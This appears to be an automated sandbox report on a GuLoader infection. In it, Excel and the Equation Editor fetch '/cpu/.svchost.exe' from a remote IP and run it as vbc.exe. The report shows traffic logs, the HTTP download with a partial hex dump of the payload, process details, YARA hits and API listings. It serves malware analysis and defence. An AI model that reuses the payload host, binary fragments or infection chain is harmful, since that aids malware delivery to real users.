Jul 15, 2021 11:06:46.129439116 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129446030 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129458904 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129466057 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129483938 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129484892 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129498005 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129506111 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129513979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129528046 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129539013 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129549980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129561901 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129579067 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.131354094 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.382335901 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382534027 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.382658005 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382684946 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382726908 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382750034 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382788897 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.382807970 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382817030 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.382833004 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382853985 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.382858992 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.382920980 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.385741949 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.385771990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.385787964 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387418032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387435913 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387453079 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387470007 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387486935 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387511015 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387531042 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387554884 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387577057 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387598038 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387618065 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387638092 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387660027 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387680054 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387701035 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387726068 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387747049 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387767076 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387789011 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387809992 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387830019 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387850046 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387871027 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387896061 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387917042 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387938976 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387962103 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.387983084 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388003111 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388024092 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388045073 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388068914 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388089895 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388111115 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388130903 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388155937 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388176918 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.388194084 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.388241053 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.389161110 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637314081 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637351036 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637494087 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637526989 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637551069 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637562990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637584925 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637623072 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637653112 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637692928 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637728930 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637751102 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637758017 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637798071 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637851954 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637887955 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637891054 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637940884 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637967110 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.637981892 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.637989998 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.638010025 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.638026953 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.638031006 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.638056040 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.638108015 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.642429113 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642453909 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642472029 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642529964 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642560959 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642581940 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642604113 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642623901 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642654896 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642676115 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.642688036 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642726898 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642748117 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642769098 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642795086 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.642797947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642819881 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642826080 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.642884016 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.642894030 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642929077 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642970085 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.642991066 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643013954 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643026114 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643035889 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643052101 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643124104 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643134117 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643204927 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643228054 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643248081 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643291950 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643301964 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643311024 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643348932 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643371105 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643392086 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643408060 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.643436909 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643450022 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.643461943 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.648536921 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:47.508958101 CEST	49165	80	192.168.2.22	180.214.239.39

HTTP Request Dependency Graph

180.214.239.39

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	180.214.239.39	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 15, 2021 11:06:44.850883961 CEST	1	OUT	GET /cpu/.svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 180.214.239.39 Connection: Keep-Alive
Jul 15, 2021 11:06:45.107646942 CEST	2	IN	HTTP/1.1 200 OK Date: Thu, 15 Jul 2021 09:06:43 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT ETag: "41470-5c7043f493d18" Accept-Ranges: bytes Content-Length: 267376 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELFR`pp@d(zX ( .text0Y` `.datapp@.rsrcz@@IMSVBVM60.DLL
Jul 15, 2021 11:06:45.107681990 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 15, 2021 11:06:45.107701063 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 15, 2021 11:06:45.107719898 CEST	6	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 15, 2021 11:06:45.362483978 CEST	8	IN	Data Raw: 74 10 40 00 ff 25 2c 10 40 00 ff 25 98 10 40 00 ff 25 44 10 40 00 ff 25 f8 10 40 00 ff 25 a4 10 40 00 ff 25 00 11 40 00 ff 25 24 10 40 00 ff 25 84 10 40 00 ff 25 5c 10 40 00 ff 25 e0 10 40 00 ff 25 dc 10 40 00 ff 25 e8 10 40 00 ff 25 48 10 40 00 Data Ascii: t@%,@%@%D@%@%@%@%$@%@%\@%@%@%@%H@%@%0@%@%@%T@%@%@%@%@%@%@%@%@%@%8@%@%P@%@%p@%@%@hC080R
Jul 15, 2021 11:06:45.362519979 CEST	9	IN	Data Raw: bb bb bb bb b0 00 00 0b bb bb bb bb bb bb b0 00 00 00 00 00 00 00 bb bb bb bb bb bb b0 00 00 0b bb bb bb bb bb bb b0 00 00 00 00 00 00 00 bb bb bb bb bb bb b0 00 00 0b bb bb bb bb bb bb b0 00 00 00 00 00 00 00 bb bb bb bb bb bb b0 00 00 0b bb bb Data Ascii:
Jul 15, 2021 11:06:45.362535000 CEST	10	IN	Data Raw: bb bb bb 00 00 8b bb bb bb bb 00 00 00 00 0b bb bb bb bb 00 00 0b bb bb bb bb 00 00 00 00 0b bb bb bb b8 00 00 0b bb bb bb bb 00 00 00 00 0b bb bb bb b0 00 00 08 bb bb bb bb 00 00 00 00 0b bb bb bb b0 00 00 00 bb bb bb bb 00 00 00 00 0b bb bb bb Data Ascii: ;7x?
Jul 15, 2021 11:06:45.362550020 CEST	12	IN	Data Raw: f7 00 1c cf f6 00 13 d0 f6 00 15 d1 f6 00 19 d1 f7 00 1d d1 f7 00 1b d4 f7 00 1e d1 f8 00 20 c2 e6 00 27 c5 e7 00 28 c5 e7 00 26 c5 e8 00 30 c7 e8 00 36 c9 e9 00 36 cc ec 00 23 d3 eb 00 3d da e3 00 21 ce f0 00 26 cf f3 00 22 d1 f7 00 26 d1 f7 00 Data Ascii: '(&066#=!&"&.!'!$)*-),6052526=9<;=>FHLJRUZ^FBEMXZ^WX^
Jul 15, 2021 11:06:45.362567902 CEST	13	IN	Data Raw: 00 00 00 00 00 00 00 4b 4b 4b 4b 4b 4b 4b 4b 4b 45 25 22 00 00 00 00 00 00 00 00 00 00 64 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 2b 18 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 4b 4b 4b 4b 4b 4b 4b 4b 4b 2b 18 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 4b 4b Data Ascii: KKKKKKKKKE%"dKKKKKKKKKK+OKKKKKKKKK+KKKKKKKKKKK%dKKKKKKKKK4]sKKKKKKKKKKE$8kKKKKKKKKKE%OKKKKKKKKKK4]KKKKKKKKKK+KKKKKKKKKKK-o
Jul 15, 2021 11:06:45.362639904 CEST	15	IN	Data Raw: 17 00 00 00 00 00 00 00 00 00 00 00 91 0f 10 04 05 1b 79 79 79 51 25 22 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 79 79 79 79 79 79 79 79 34 1e 00 00 00 00 00 00 00 00 00 00 00 0e 06 12 b2 06 01 3f 79 79 2b 18 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: yyyQ%"yyyyyyyyy4?yy+Z%"EbEnQ$;4%:L
Jul 15, 2021 11:06:45.362704039 CEST	16	IN	Data Raw: 61 ea fc 00 65 eb fc 00 69 ec fc 00 73 e3 f7 00 73 e3 fb 00 76 e4 fb 00 78 e3 fb 00 7e e5 fb 00 7e eb fc 00 7b ee fc 00 7f ee fc 00 9c d8 bd 00 b2 e2 ce 00 b5 e3 cf 00 b8 e4 d1 00 89 e7 fc 00 83 ee fc 00 8d e8 fc 00 8a ee fc 00 99 ed f4 00 9c ee Data Ascii: aeissvx~~{

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2652 Parent PID: 584

General

Start time:	11:05:42
Start date:	15/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13ffb0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2184 Parent PID: 584

General

Start time:	11:06:04
Start date:	15/07/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2520 Parent PID: 2184

General

Start time:	11:06:07
Start date:	15/07/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	267376 bytes
MD5 hash:	FCFB0EC70F1419EDE8A534CC95CB61E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus matches:	Detection: 42%, Virustotal, Browse Detection: 14%, Metadefender, Browse Detection: 31%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2520 Parent PID: 2184 vbc.exeCOMMON

Executed Functions

Function 003E54E7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 161memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003E56A2

Strings

y, xrefs: 003E57BB

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: y
API String ID: 2167126740-4225443349
Opcode ID: ccb9250a56514e3bcf147866c2b53727f3f21d783a92aff79db98ba1b2535767
Instruction ID: 3568d44b549062c2e5b37ba7a750133e288b1b13f834fba884a3851818f62b0d
Opcode Fuzzy Hash: ccb9250a56514e3bcf147866c2b53727f3f21d783a92aff79db98ba1b2535767
Instruction Fuzzy Hash: 4E517776A0939ACFEF319F758C517DA3BA1EF1A750F85012DDC898B280D7358A80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003E55AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003E56A2

Strings

y, xrefs: 003E57BB

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: y
API String ID: 2167126740-4225443349
Opcode ID: a5341afa1f59408f94a8a9e1ce93185e6b60ab566ed768acb8133b4381641583
Instruction ID: b59149137867aa8546bea906f608f9a7d91bb53b38d4b1f19f696af92b58f32c
Opcode Fuzzy Hash: a5341afa1f59408f94a8a9e1ce93185e6b60ab566ed768acb8133b4381641583
Instruction Fuzzy Hash: 7741217464938A8FEB32AF318C557D97FA1EF06394F58426DDCC58B252D3309A80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 004335E4, Relevance: 216.5, APIs: 116, Strings: 7, Instructions: 1225COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00433730
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043374B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CE8,00000138), ref: 0043376D
__vbaFreeObj.MSVBVM60(00000000,00000000,00432CE8,00000138), ref: 00433778
__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00433790
__vbaObjSet.MSVBVM60(?,00000000), ref: 004337AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432CF8,000001C8), ref: 004337F9
__vbaFreeObj.MSVBVM60(00000000,?,00432CF8,000001C8), ref: 00433804
__vbaNew2.MSVBVM60(0043199C,`S_), ref: 0043381C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433837
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000098), ref: 00433861
__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00433880
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043389B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000130), ref: 004338C0
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004338D6
__vbaStrVarMove.MSVBVM60(00000000), ref: 004338DF
__vbaStrMove.MSVBVM60(00000000), ref: 004338EC
__vbaFreeStr.MSVBVM60 ref: 0043391F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0043393B
__vbaFreeVar.MSVBVM60 ref: 00433949
__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00433961
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043397C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000130), ref: 004339A1
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004339B7
__vbaStrVarMove.MSVBVM60(?), ref: 004339C6
__vbaStrMove.MSVBVM60(?), ref: 004339D3
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433A0B
__vbaFreeStr.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433A1D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00433A32
